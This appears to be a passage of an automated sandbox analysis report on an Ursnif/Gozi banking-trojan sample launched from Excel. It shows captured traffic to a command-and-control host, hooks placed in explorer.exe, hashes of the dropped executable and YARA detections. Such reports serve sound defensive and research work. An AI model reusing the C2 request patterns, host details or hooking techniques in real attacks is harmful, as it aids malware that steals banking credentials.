9c 87 73 23 ff ff ff 01 9c 87 72 07 9c 87 72 bb 9c 87 73 5d ff ff ff 01 ff ff ff 01 9c 87 73 1b 9c 87 73 db 9c 87 73 6b 9c 87 73 03 9c 87 73 03 ff ff ff 01 ff ff ff 01 9c 87 73 03 9c 87 73 af 9c 87 73 5d ff ff ff 01 9c 87 73 0d 9c 87 72 cd 9c 87 73 37 ff ff ff 01 ff ff ff 01 9c 86 73 09 9c 87 73 c9 9c 87 72 91 9c 86 72 a3 9c 87 73 81 9c 86 72 05 ff ff ff 01 ff ff ff 01 9b 87 73 85 9c 87 73 7f ff ff ff 01 9c 87 73 0d 9c 87 73 cb 9b 87 73 37 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 69 9c 87 73 3f 9c 87 73 37 9c 87 73 13 ff ff ff 01 ff ff ff 01 9b 87 73 83 9c 87 73 7f ff ff ff 01 9c 87 73 07 9c 87 73 b9 9c 87 72 57 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 c9 9c 87 73 97 9c 87 73 a9 9c 87 73 a9 9c 87 73 97 ff ff ff 01 ff ff ff 01 9c 87 73 ab 9c 87 73 5b ff ff ff 01 ff ff ff 01 9c 87 73 73 9c 87 73 ad 9c 87 73 05 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 6d 9c 87 73 49 9c 87 73 3b 9c 87 73 07 ff ff ff 01 9c 87 73 21 9c 87 73 d3 9c 87 73 23 ff ff ff 01 9c 87 73 05 9c 87 73 1b 9b 87 73 d3 9c 87 73 51 ff ff ff 01 9b 86 73 09 9c 87 73 cb 9c 87 73 89 9b 87 72 83 9c 87 73 6d 9c 87 73 05 9c 87 72 07 9c 87 73 97 9b 87 72 91 9c 87 73 03 9c 87 73 05 9b 87 72 89 9c 87 73 07 9c 87 73 51 9c 87 73 d9 9c 87 72 4b 9c 87 73 07 9c 87 73 67 9c 86 73 27 ff ff ff 01 ff ff ff 01 9b 86 73 0d 9c 87 73 81 9c 87 73 c5 9c 87 73 17 9c 87 73 27 9c 87 73 5f 9c 87 73 f7 9c 87 73 85 9c 87 73 09 9b 87 72 51 9c 87 73 d3 9c 87 73 9d 9c 87 73 4b 9c 86 72 2f 9c 87 73 33 9c 87 73 61 9c 87 73 bd 9b 87 73 b1 9c 87 73 21 9c 87 73 23 9c 87 73 cd 9c 87 73 87 9c 87 73 f9 9c 86 73 f9 9c 87 73 83 9c 87 73 07 9c 87 73 1f 9c 87 73 79 9c 87 73 b9 9c 87 72 c5 9c 87 73 c3 9c 87 72 a7 9c 87 73 55 9c 87 72 0b 9c 87 73 1d 9c 87 72 c9 9c 87 73 ff 9c 87 73 85 9c 87 73 f7 9c 87 73 f9 9c 86 73 f7 9c 87 73 7f 9c 87 73 03 ff ff ff 01 9c 87 73 07 9c 87 72 0d 9c 87 73 0b 9c 87 73 05 ff ff ff 01 9c 87 72 15 9c 87 73 Data Ascii: h& ( @sssswrssssssssssrs{ss#ssrsss[sssssss}ssWrssmsKsCswsss%s!sssssUssYsssr#ssssr%s[ssss]srsSssqssssssussssssAs%ss#rrs]sssksssss]srs7ssrrsrsssss7sssis?s7sssssrWssssssss[sssssssmsIs;ss!ss#ssssQsssrsmsrsrssrssQsrKssgs'sssss's_sssrQsssKr/s3sasss!s#ssssssssysrsrsUrsrssssssssrssrs

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.1.102	49713	185.98.87.176	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
May 27, 2020 10:32:18.430227995 CEST	506	OUT	GET /images/t9bICS3iYBibv2PUw120w/zrQnDc3C1vDoaX9b/MyXydjBSzbjp_2B/WxqBHRpL0Pbm6ZFBzL/GosOdeA0A/lXg5KR2wNHrBWWmgpwK2/2N2Dl0xmBlO08ZoSXlZ/gJF0VSPK0OHiMUWp2tnn4b/jxE9PAGTU/lXz.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: line.beibiandmom.com Connection: Keep-Alive Cookie: lang=en
May 27, 2020 10:32:19.067949057 CEST	508	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 (Ubuntu) Date: Wed, 27 May 2020 08:32:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=p78dm5bl6ja5mdb8gmof782nb0; path=/; domain=.line.beibiandmom.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Encoding: gzip Data Raw: 33 30 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9c c7 b2 9c 48 10 45 3f 88 45 e3 cd 12 ef bd 69 60 87 f7 de 34 bc af 9f d2 ac 14 31 d2 c4 6b 35 45 56 e6 b9 27 35 89 c2 90 de 87 ea c9 d7 69 bd 45 93 f3 d3 df 28 da d5 f8 92 7f b4 8f 38 e8 b3 98 84 a4 9f 58 1d 33 d9 8a 88 8d 15 fe 30 75 44 79 a4 39 37 3e af 2d f8 73 3b b0 a9 dc 3e 06 2f 7d ce d0 ac d6 93 07 02 97 f8 1d 75 37 77 0c d6 7d 5f 11 7d 30 f4 16 70 cd e5 58 28 ef 47 d4 f7 ce 26 2b 57 94 90 c5 e8 de e4 3b c7 bf 6c 9a bf 69 f6 81 ed 0b 7d 4a ad e1 c7 2a 13 f6 4a 65 15 b4 3e 44 4c d2 b2 65 e0 a5 3c 53 38 7f 0e a3 2b 3e 3b 9b 85 35 27 1c cc 5f ed 2d 67 d0 eb 86 7e 0b 6e 3a 36 64 d4 7a bf f2 2f 61 e1 f6 2a ee 24 15 5c 7d 6e 26 03 9a 7f cc b7 92 5b 85 e9 be 57 73 c0 72 cf 4a c7 6e d1 7f b5 e4 42 6f 52 b5 a8 92 e8 58 5e ce d5 23 cb 24 a1 0c 29 be 38 ca 5c f9 0a 09 1f 5c a0 21 74 72 d7 ce 26 05 9c 2a 65 a6 ea fb 53 6c e7 67 59 ad 1e 7e 3c aa 23 a2 69 fb f9 bc a9 5c d4 b5 ea 63 c5 39 76 91 48 fc ad d1 98 8e 18 56 3b 56 bc 06 c1 39 85 e5 1a 0e 7e b8 74 e7 18 79 4a f4 c7 64 d0 6f c5 d1 7e d2 d0 3a 11 3f 5c a5 a4 c8 e3 57 ea bf 0f 5e c3 f1 07 92 b4 24 08 09 f8 6e a4 66 98 1f 78 e8 f1 8a bf a4 7c d5 dd 7d 8c 0f dc ba 5f 24 c4 e0 cb b5 ce 6a 7b 47 36 dd 96 f3 91 64 94 7c 96 9d 0d a8 90 d1 46 8c b0 74 42 ba 95 b9 40 d4 01 df 9c 91 36 92 f3 f4 7c c2 c7 a6 5d b4 5d bb 99 2d ac a7 44 2d c5 57 71 14 7e 42 ca 49 7f ec 68 d8 be 0d d9 bf 5f 7f 8a 04 a2 88 c5 2e 6a 25 e5 d0 5d cc d1 56 77 ed 02 67 74 e4 42 cc 78 32 c3 ef 54 10 de 84 af fe ea dc 4a 9f 8f e7 ac b2 c6 37 9b 9e 68 e9 da e3 2b bc 10 f1 98 93 a6 c2 8a 2c fc c2 8e 44 bf 4e 32 a4 02 3f ec ea f6 41 6a 3c 38 3d 95 cc 95 0f e5 bb e4 70 10 af 18 1c 81 61 da dc f5 09 b2 f1 1d 52 d4 40 8b 9f 2e bd 2a f8 33 7f 81 f4 91 60 11 62 f0 18 aa 09 5b 4e 5c 39 52 f2 e1 ab d1 f5 1d ad 75 4f 48 cb 13 6b 27 07 8f 02 b5 70 75 27 63 f8 40 b3 dc bc 64 bf f6 ef 9d 26 be 28 48 1d 32 e8 a5 f0 1a 6e 2a c8 2c 30 1d 61 b1 a2 bf 77 d8 bf ac 3a 3a 5d 67 42 4d 37 db 81 cd 44 4a ec 47 cd a1 77 2e 1b cd 51 7c 2a 23 de 6c 22 ea 14 6e b5 88 de 27 5d 1a 06 c2 33 3f 6f a0 5a 44 1c 62 b9 e4 cb f5 1d df fa e4 da 41 44 fe 38 e8 c8 27 57 f0 5c 75 16 cd c7 12 e1 65 aa b3 f6 a9 04 fd d9 f2 77 1c 2c 23 8d e5 ec 2f 2f 91 7a d3 b7 8b 0a 9b ee fe 0b 60 da d9 93 aa aa 90 68 94 0a 51 b5 71 72 82 79 09 b9 f9 db b1 2f 78 82 4d f4 93 06 a4 33 fd 10 22 23 93 ca a8 3c 16 fd b9 01 42 f4 8f 2e 2a d0 70 69 5f f2 4f 6d 23 e2 c1 4e 8f 1b 10 94 e2 df 64 d1 c9 5f b6 e6 c2 27 9d ca 18 ea 53 49 f0 85 3c b5 5c 5b 8b b2 54 1d 25 9e 2c ae 2c c7 b9 24 f8 8e ab ce c2 a8 55 bb df e2 0e f0 e4 7b 29 d3 72 53 74 f7 74 ee fa 0e 02 78 b7 1c af bd a6 d2 d7 87 a0 a3 b8 b4 33 94 0e 2e b3 34 26 12 5b 5c 64 1e e9 9f 6f ae f5 34 ff f2 e3 b2 12 54 Data Ascii: 300aHE?Ei`41k5EV'5iE(8X30uDy97>-s;>/}u7w}_}0pX(G&+W;li}JJe>DLe<S8+>;5'_-g~n:6dz/a$\}n&[WsrJnBoRX^#$)8\\!tr&eSlgY~<#i\c9vHV;V9~tyJdo~:?\W^$nfx\|}_$j{G6d\|FtB@6\|]]-D-Wq~BIh_.j%]VwgtBx2TJ7h+,DN2?Aj<8=paR@.3`b[N\9RuOHk'pu'c@d&(H2n,0aw::]gBM7DJGw.Q\|#l"n']3?oZDbAD8'W\uew,#//z`hQqry/xM3"#<B.*pi_Om#Nd_'SI<\[T%,,$U{)rSttx3.4&[\do4T
May 27, 2020 10:32:19.067981005 CEST	509	IN	Data Raw: 85 94 f8 63 1d 37 bf b5 a5 0c 05 67 d5 9a 9e 05 53 99 59 7b d2 6d 2a c6 ab 78 ec 71 a7 8d 3b 0d 94 2a 4f db 2d 1d 35 6d c4 7f e1 b7 22 2e 97 f6 02 b6 88 a2 9f e1 28 2b 4c e1 6f e2 f4 d2 a2 69 e5 64 2a e7 20 37 4b d6 c5 22 5d 78 7f fa fb 9d cb 79 Data Ascii: c7gSY{mxq;O-5m".(+Loid* 7K"]xy0\<bwAkLUo$5h918MBY~T/1GG#(n>0n[o.Fq5d_\|6r9-o+f[k2/S\|[F]7nTb\|&/[Wu
May 27, 2020 10:32:19.068002939 CEST	510	IN	Data Raw: a5 06 5a 68 04 8b 8d 32 bf 30 8b 4f bd 40 a3 8f e5 fc 43 a7 7f cb bb e8 23 eb 92 e1 01 f1 7c 6a 04 a2 e9 98 05 a1 38 2c fc 99 72 f7 d8 3e 64 ea 87 2b d1 b0 93 d8 f7 46 eb 9e d7 1c 5b b8 3e 79 70 79 7a 4d de d2 42 6c 43 b8 64 74 1d ba 84 de 83 6f Data Ascii: Zh20O@C#\|j8,r>d+F[>ypyzMBlCdtotkGh[3k3V>6FX[J i\|ZJJKb,<~D9M+xir7G KPoHS%BL2O%P;SrMG+KIW.IX>qVybo
May 27, 2020 10:32:19.068016052 CEST	512	IN	Data Raw: 6a 7f be c2 e9 0c 53 cf 74 46 13 a8 e8 9b 58 c6 36 61 b6 db dc ca 82 03 43 ef a5 d8 4b 36 5c ca 2d e3 6a 88 cd 96 17 0d 8b 0c cd 61 fe 52 e5 46 32 59 78 16 8b 03 61 1a 55 89 de 39 76 c6 6e c5 8d 9f f5 a9 3d b3 72 87 d1 da 1d 42 72 d4 93 71 e5 7a Data Ascii: jStFX6aCK6\-jaRF2YxaU9vn=rBrqz_%A9'dX\SP`Z't~oIorf[!v}AtEw1F;$aUl'Wu$} \/n'"(j?aK-
May 27, 2020 10:32:19.068028927 CEST	513	IN	Data Raw: bf a8 50 a0 93 b5 54 f3 8b d7 62 d7 88 46 82 40 73 56 72 80 e7 85 06 89 1f 66 fe ed bd 62 fd c1 49 cc 28 70 56 95 c3 cf 33 75 1e 6e fc 0a 6e dd f6 83 55 9f d2 b7 5f 4d af 9c 4d 7c 7c 97 45 1e 69 ff d2 94 1f ed a0 59 15 bf 14 d2 3a b5 46 51 4a 12 Data Ascii: PTbF@sVrfbI(pV3unnU_MM\|\|EiY:FQJ-[UhsTq2:SnL1A4ZB`xe,:&.55at\|>Yq\/-p"vDA {q/1k"/<8Q)>Lw`OSW^
May 27, 2020 10:32:19.068068981 CEST	514	IN	Data Raw: 42 c8 de d4 73 51 e4 98 8f b0 53 3f 80 bf 33 f3 9d b0 26 35 18 bf b0 09 e6 bb 1b f5 e7 ab c9 a7 80 47 e1 b3 81 88 71 1b d3 e4 39 13 ab 6c 39 82 79 1e d6 5c ab f1 5c 42 ae 8d 75 7a d5 d1 59 19 b8 c5 d8 43 b3 f1 70 fc 99 8d 58 06 c0 7e 53 3e ac 78 Data Ascii: BsQS?3&5Gq9l9y\\BuzYCpX~S>xdXF{I8\|wB!>>qk`jZ1t92s#OOs\/N;T-pRNu+e~_
May 27, 2020 10:32:19.068121910 CEST	516	IN	Data Raw: 7f aa 21 bc ed 08 54 11 10 83 57 48 dc 8d 47 00 59 3d d7 6e bf fb ee 2e 2e a8 fb 69 b1 da 8f 74 22 3f de 98 04 bd 69 00 bd b8 d4 d4 79 ff 18 3b 51 3f ac b3 a0 64 e0 34 e4 3f 1b 21 54 e7 5a 7e 40 78 ec 5e 46 ba 05 e9 62 08 9c ba 1f 33 19 2c cc ac Data Ascii: !TWHGY=n..it"?iy;Q?d4?!TZ~@x^Fb3,P(wJp7R_\|/LG}{3194K~?%z*ekLf`lY.~cqs)_IoI6I/=zkt[]cb}5j
May 27, 2020 10:32:19.068135977 CEST	517	IN	Data Raw: 31 56 d9 0b c4 b1 e3 f0 6e 18 60 67 fb a5 e6 ea ca 20 1b b1 9c d7 6f 26 3e 20 f6 ab 0e d2 aa 8e ed 95 05 ab d5 be 10 8f f7 37 4c 75 05 61 f4 00 72 3e e1 ec cf 7d 00 a4 f2 5c 16 73 b6 a8 5c 56 60 a6 9a 43 bd ce d6 8d 3a 0a f0 3a 17 46 b2 ab 12 5c Data Ascii: 1Vn`g o&> 7Luar>}\s\V`C::F\LV\|?0)o;1an#9Pq >2 ONR2j9N7=W1 [2Y`7X{2)oM=R~#l[;~+"/Hz!>,LpQ
May 27, 2020 10:32:19.068150997 CEST	519	IN	Data Raw: 62 e8 07 96 f3 2f 2a 56 8d 0a 54 9c e3 33 75 3c e7 db ed cd a7 6f 86 06 6e 22 ec 6f c2 e6 d1 6e 78 86 f9 13 fd c8 30 df 18 89 d9 4c 5b 10 d5 ba 94 a4 76 d6 10 c8 df ef b9 03 93 cd 16 88 02 81 50 13 7c 53 93 e1 54 fd 0f d0 2a ef 91 ad 75 37 12 b0 Data Ascii: b/VT3u<on"onx0L[vP\|STu78s k[WW<F/E\A/"3.S0EwLaYG3-_OcX%r`VV{_R@N?4u>61(
May 27, 2020 10:32:19.068200111 CEST	519	IN	Data Raw: 5e 35 37 8a 7c 0c 90 e7 27 3b 54 f7 89 ce 2e 16 75 b4 40 b2 5b 62 28 67 60 db 00 b7 e9 dc 20 41 a9 a8 03 d2 0e fb df c4 d5 57 34 89 e6 f0 a1 21 92 bd 59 20 0b a7 63 28 9d 63 43 f4 85 8e 2d 62 44 46 0d c0 36 60 ad 14 91 86 b6 92 52 51 f8 b7 84 61 Data Ascii: ^57\|';T.u@[b(g` AW4!Y c(cC-bDF6`RQaZ2NK"WwuFwz+>9K#Vz?BsW BO`b/Q.1N{_`W/ni>~By[*g$D~qaHt]S>3KCY
May 27, 2020 10:32:19.258272886 CEST	521	IN	Data Raw: 33 30 30 30 0d 0a 77 31 bb 81 a1 60 01 60 ac 19 d0 58 7e 30 6a be 90 88 fb 3e 15 d2 69 dc 29 88 14 30 15 ef 0c fd e0 4b 13 c4 a6 a8 90 2d f2 ce bb e8 e8 7f eb 08 56 e4 e6 22 95 35 62 84 70 12 d3 f4 48 b2 cd 8f 83 ec f9 15 7e be e3 8c 19 24 ef 29 Data Ascii: 3000w1``X~0j>i)0K-V"5bpH~$)@_ ()L VW'kK3AWty$piA-N-NG4J-qY>4p8oWk?/jdLk5/FRYg}B"X/=k

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.1.102	49716	185.98.87.176	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
May 27, 2020 10:32:24.217519045 CEST	737	OUT	GET /images/3_2FaICNUesWBp6cSMSOvh/R7KiXoQV8WPnC/Gi5kIny8/M1v_2BPzvRNcy_2BKgs8L4Q/hKfV7HFmnL/iMeEq89GLPuG00D9I/_2FkLuvkpKF8/RCMI7F_2BZd/0qw1rsLjdDv5Qk/OfpxfZVdeyjHI411VH04a/uGhCwSB2/A.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: line.beibiandmom.com Connection: Keep-Alive Cookie: lang=en
May 27, 2020 10:32:24.674736977 CEST	739	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 (Ubuntu) Date: Wed, 27 May 2020 08:32:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=0g79l3r19lkubvmt96hod3o400; path=/; domain=.line.beibiandmom.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Encoding: gzip Data Raw: 37 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0c 94 45 92 84 40 00 04 1f c4 01 b7 23 0e 83 3b cc 0d 77 68 74 80 d7 ef fe a0 32 33 a2 f0 fb 18 ee 31 94 f6 59 0f b7 e6 ed 6c 03 a3 67 64 18 e4 71 b0 e5 25 f3 de f6 e3 7c 24 a5 92 81 a3 e0 47 c2 f0 10 42 b8 fb 1a 38 fb 0a a2 5c d6 a9 e4 59 6a 4d 03 d5 7b 6e 90 ee 01 7c 28 19 20 47 74 f2 1a 38 46 1a 6a 53 25 3f 5f e0 9a b4 77 f3 63 80 89 ed 93 ba f1 ab af 9c 0d c5 08 af 43 93 c3 66 d8 25 d0 cf 9b 1f 67 e5 a1 34 f7 51 ba 9a cc 9e 33 d7 cd 75 dd e7 dd 37 f6 24 99 e3 3d c1 7c fe 23 01 79 5c ee 59 81 30 16 75 21 ce 10 bc 8f b8 9c 7c 8a 00 9e 65 77 e9 37 7d f8 3c 46 a6 56 71 8d 2b 69 c1 ab d2 12 2f 3e c3 23 2f bb 0e 96 0a cc 30 89 3f d0 5a 14 e6 3c d6 43 0f 0a a4 d1 6f 39 7c 17 eb 21 b3 58 1c 0f b7 b4 a5 da cc 05 88 21 f7 fb f2 b4 92 64 27 7d 01 de 3d 31 f8 6a 2d 26 f0 d7 09 09 9a ce 7d c8 ba 8e 18 a7 a7 b5 e1 51 51 f0 15 a8 2f 76 9c da b3 c1 d1 4d 5c 58 5c 2c 98 f5 05 71 44 ca 87 2e 16 95 9e 3a fd 77 da 3d e9 6c ec 8c 09 26 ec 3b 67 da 19 22 34 12 be a3 22 c7 c1 8b 44 47 e3 d2 e8 1c 64 7d 88 8a 42 45 82 85 f9 34 90 28 79 6c 75 1c 51 89 26 f6 6f 63 4c 31 77 e7 b3 1f 18 ef be 6f ab 7f fb 4b 59 6f 5b 46 bd 24 1b 4f eb ee 56 0b 24 6b 4e 8d 0e ab 33 bc cf 5a 71 7d 51 e1 f1 68 c3 3b 9a c8 7a 0f c4 fc 18 cd 81 39 27 e1 56 2d 50 8a 10 75 b3 08 4f 97 bc 46 53 39 48 b0 d6 b6 3c 3c e9 30 8c d0 42 62 3d 03 a9 fd e8 c3 a4 86 1a 67 c1 d0 3b bb cf f8 36 f9 2b 89 b9 41 c5 1b 72 6f e2 18 d2 aa 75 12 e0 ab fd 04 6b bd 46 e1 e7 ab 4d 64 99 f2 8b 6c e9 21 49 ac 9a 0d 0c b6 6f 89 9c 21 52 6b 78 4f 03 0c 17 e7 88 84 01 fc f9 7d 2c 24 ad 49 e8 0d f1 34 e0 eb 98 87 d1 d7 74 8e 25 7b e1 da 42 3d 76 d0 0c ce 3c 97 77 f8 f0 04 9d c9 89 00 7f 4a ec de 2a 1f 5b 45 57 b4 eb 57 f4 b1 ca 98 c6 04 4b 02 28 18 33 f8 f3 85 aa 4e d3 67 f7 cb f2 34 82 d5 dc 41 30 54 fa cb 07 d4 12 d9 08 b9 22 1c e6 18 d8 1e 63 a8 f8 77 57 5e 84 cd 4c bb ba 2f 53 b8 e6 68 45 83 1f 29 ce 58 0f b3 3d 89 46 28 69 c8 6a df 96 e5 1d 1b c7 ce cf c8 cd 0f c8 09 5d 4a 55 78 1f bc c0 fa 38 16 f5 7a 0d a6 99 72 f6 fb 51 2f de 1d 70 29 85 44 59 36 fb e7 1f 7b 0d 86 ac 8e 29 b8 7e c2 d0 ab 6b 5c 00 22 c2 4e bf d6 90 bb 65 a7 eb 88 a5 d5 a9 aa 8e 00 0a fd 66 75 51 7c b4 d9 76 a4 5a 4d 63 1d 2e 65 bf 7a 5b 04 4e 89 30 9d 29 30 55 1c 7c df 25 7b a2 f6 cd 80 af 5f 36 9e 21 db 85 64 db c9 c3 4f 1f c9 a8 4f 58 ba 59 26 ce c7 7a 28 83 53 18 85 a6 6b 11 cf 94 48 2c a7 06 0a 49 86 77 8c d1 f4 79 a4 ab 0b db ab 68 fd d7 14 75 6c ce 57 e2 5f 4a 83 1d 42 b7 95 7d 51 43 a3 b4 02 1b 5b 4f 01 4b 8f 55 9d ed bd 17 4b 91 57 82 4a 09 ef 97 5c 7d 9d af e1 76 c0 92 12 0b 0b c5 75 3c 62 bc a3 f7 0c ea 3d 20 91 db 2a a1 52 68 fb 1d 3d 15 a1 13 22 d1 eb 07 e5 ec e5 d8 37 0a 4d d5 1d c5 71 4c 55 6e 9f 96 c1 e2 6e Data Ascii: 790E@#;wht231Ylgdq%\|$GB8\YjM{n\|( Gt8FjS%?_wcCf%g4Q3u7$=\|#y\Y0u!\|ew7}<FVq+i/>#/0?Z<Co9\|!X!d'}=1j-&}QQ/vM\X\,qD.:w=l&;g"4"DGd}BE4(yluQ&ocL1woKYo[F$OV$kN3Zq}Qh;z9'V-PuOFS9H<<0Bb=g;6+AroukFMdl!Io!RkxO},$I4t%{B=v<wJ[EWWK(3Ng4A0T"cwW^L/ShE)X=F(ij]JUx8zrQ/p)DY6{)~k\"NefuQ\|vZMc.ez[N0)0U\|%{_6!dOOXY&z(SkH,IwyhulW_JB}QC[OKUKWJ\}vu<b= Rh="7MqLUnn
May 27, 2020 10:32:24.674777031 CEST	740	IN	Data Raw: 08 f3 0d c8 0b 09 f6 63 df 8b f1 87 2b 7b 0c 43 70 f1 ed ab 5e 6f 20 97 ce 95 da b9 d0 9f e4 d8 a5 b4 af 3f 62 70 5a b1 21 48 19 c3 d2 49 69 4b a6 76 30 f6 7f 9b 79 71 d6 54 af 82 16 6a 4f b9 19 5f 76 b3 e8 ff f8 25 87 1a fd a9 65 9d 2b 47 4c f9 Data Ascii: c+{Cp^o ?bpZ!HIiKv0yqTjO_v%e+GL[v]ui#2]WIgnX*ii)bgTh~.C^Bwn#zEbaF%]m vSD,%V]E+q~~kgK)tZk>35(80)hxL

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe

Processes

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFCE13E521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFCE13E5200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFCE13E520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFCE13E5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	537AF00

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFCE13E5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	537AF00

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 6060 Parent PID: 788

General

Start time:	10:30:21
Start date:	27/05/2020
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x8a0000
File size:	43854104 bytes
MD5 hash:	D672D26C85AEB9536B9736BF04054969
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: CVPFktt.exe PID: 5940 Parent PID: 6060

General

Start time:	10:30:46
Start date:	27/05/2020
Path:	C:\sxibiNa\ZpsvnMb\CVPFktt.exe
Wow64 process (32bit):	true
Commandline:	'C:\sxibiNa\ZpsvnMb\CVPFktt.exe'
Imagebase:	0x400000
File size:	167424 bytes
MD5 hash:	7494B31AF8F89F1051C7E9332FF7D331
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.673957499.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.673957499.0000000001AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.853724525.00000000018FC000.00000004.00000040.sdmp, Author: Joe Security Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000002.926087317.00000000009E1000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, Author: CCN-CERT Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.674022899.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.674022899.0000000001AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.673619399.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.673619399.0000000001AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.673893180.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.673893180.0000000001AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000002.928248416.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.840741747.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000003.673792212.0000000001AF8000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.673792212.0000000001AF8000.00000004.00000040.sdmp, Author: Joe Security Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Author: CCN-CERT Rule: 